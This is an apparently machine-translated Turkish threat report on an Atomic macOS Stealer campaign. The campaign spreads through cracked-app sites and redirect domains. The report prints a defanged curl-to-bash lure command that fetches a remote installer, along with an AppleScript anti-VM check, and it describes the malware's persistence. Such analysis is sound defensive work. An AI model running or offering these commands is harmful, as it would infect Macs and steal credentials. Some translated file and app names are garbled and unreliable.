MACOS kullanıcılarını hedefleyen gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıktı ve ünlü Atomik MacOS Stealer’ı (AMOS) sunmak için ücretsiz yazılımın yaygın arzusundan yararlandı.
Bu bilgi çalan kötü amaçlı yazılım, popüler uygulamaların çatlak versiyonları olarak maskelenir, şüphesiz kullanıcıları sadece ücretsiz yazılım alternatifleri indirdiklerine inanırken kendi sistemlerinden ödün vermeye kandırır.
Kampanya, siber güvenlik manzarasında önemli bir değişimi temsil eder ve macOS cihazlarının pencere karşılaşmalarından daha güvenli olduğu uzun süredir devam eden algıya meydan okuyor.
Apple cihazları profesyoneller ve yüksek değerli hedefler arasında popülerlik kazandıkça, siber suçlular taktiklerini bu büyüyen pazardan yararlanmak için uyarladılar.
Saldırganlar, birden fazla dağıtım yöntemi kullanarak ve algılamadan kaçınmak için altyapılarını sürekli olarak döndürerek dikkate değer bir karmaşıklık sergiliyorlar.
Kötü amaçlı yazılımların erişimi, tarayıcı kimlik bilgileri, kripto para birimi cüzdanları, telgraf konuşmaları, VPN yapılandırmaları, anahtarlık verileri, Apple notları ve çeşitli belge dosyaları dahil olmak üzere hassas bilgileri hedefleyen basit veri hırsızlığının çok ötesine uzanır.
Veri toplama konusundaki bu kapsamlı yaklaşım, AMOS’u hem bireysel kullanıcılar hem de kurumsal ortamlar için özellikle tehlikeli hale getirir, burada tehlikeye atılan kimlik bilgileri daha geniş organizasyonel ihlallere yol açabilir.
Trend mikro araştırmacıları, bu kampanyayı yönetilen algılama ve müdahale hizmetleri aracılığıyla tanımladılar ve kötü amaçlı yazılımların teknik istismarlardan ziyade sosyal mühendislik yoluyla geleneksel güvenlik önlemlerini atlama yeteneğine dikkat çekti.
Analiz, saldırganların öncelikle çok sayıda çatlak macOS uygulamasına ev sahipliği yapan ve ilk enfeksiyon vektörü olarak hizmet veren Haxmac.cc gibi web siteleri aracılığıyla dağıttığını ortaya koydu.
.webp)
Dağıtım stratejisi, dtxxbz1jq070725p93 dahil olmak üzere karmaşık bir dönen alan ağından kullanıcıları yeniden yönlendirmeyi içerir[.]CFD, Goipbp9080425d4[.]CFD ve IM9ov070725ique[.]CFD.
.webp)
Bu yönlendiriciler sonunda kurbanları Ekochist.com, Misshon.com ve Toutentris.com gibi alanlarda barındırılan açılış sayfalarına götürür ve burada iki temel kurulum yöntemiyle karşılaşırlar.
Terminal tabanlı kurulum ve kalıcılık mekanizmaları
En başarılı dağıtım yöntemi, kullanıcılara doğrudan MacOS terminal uygulamasında kötü amaçlı komutlar yürütmelerini öğretmeyi içerir.
Bu yaklaşım, özellikle imzasız uygulamaların çalışmasını önleyen Apple’ın Gatekeeper Güvenlik özelliğini atladığı için özellikle etkilidir.
Kullanıcılara şunlar gibi görünüşte zararsız komutlar sunulur:-
curl - fsSL https[:]//goatramz[.]com/get4/install[.]sh | bashYürütüldükten sonra, bu komut birkaç kritik işlem gerçekleştiren bir kurulum komut dosyasını indirir ve çalıştırır.
Komut dosyası ilk olarak geçici dizine “Update” adlı bir Applescript dosyasını indirir ve daha sonra sanal havuzlu ortamlarda algılamayı önlemek için sanallaştırma önleme kontrolleri yapar:-
set memData to do shell script "system_profiler SPMemoryDataType"
if memData contains "QEMU" or memData contains "VMware" then``` set exitCode to 100
else
set exitCode to 0
end ifKötü amaçlı yazılım, üç anahtar dosyayı içeren sofistike çok bileşenli bir sistem aracılığıyla kalıcılık oluşturur. Birincil Stealer Binary (.Helper) gerçek veri toplama işlemini gerçekleştirirken, bir izleme komut dosyası ([.]aracı) kullanıcı giriş oturumlarını algılamak için sürekli çalışır.
Bir Launchdaemon yapılandırma dosyası (com[.]bulucu[.]yardımcı[.]PLIST) Başlangıçta izleme komut dosyasını otomatik olarak başlatarak kötü amaçlı yazılım sisteminin yeniden başlatılmasını sağlar.
Kalıcılık mekanizması, .Agent komut dosyasının etkin kullanıcı oturumları için sürekli olarak izlediği ve uygun kullanıcı bağlamında .helper ikili çalıştırdığı sonsuz bir döngü oluşturur.
Bu tasarım, kötü amaçlı yazılım meşru sistem süreçleri yoluyla çalıştığı ve bariz uzlaşma göstergeleri oluşturmaktan kaçındığı için düşük bir profili korurken tutarlı bir çalışma sağlar.
Veri eksfiltrasyonu, her enfekte olmuş sistem için benzersiz tanımlayıcılar içeren özel başlıklarla komut ve kontrol sunucularına HTTP Post istekleri aracılığıyla gönderilen sıkıştırılmış ZIP arşivleri yoluyla gerçekleşir.
Kötü amaçlı yazılımların kapsamlı veri toplama özellikleri, sofistike kaçırma ve kalıcılık mekanizmaları ile birleştiğinde, güvensiz kaynaklardan yazılım indiren macOS kullanıcıları için zorlu bir tehdit haline getirir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.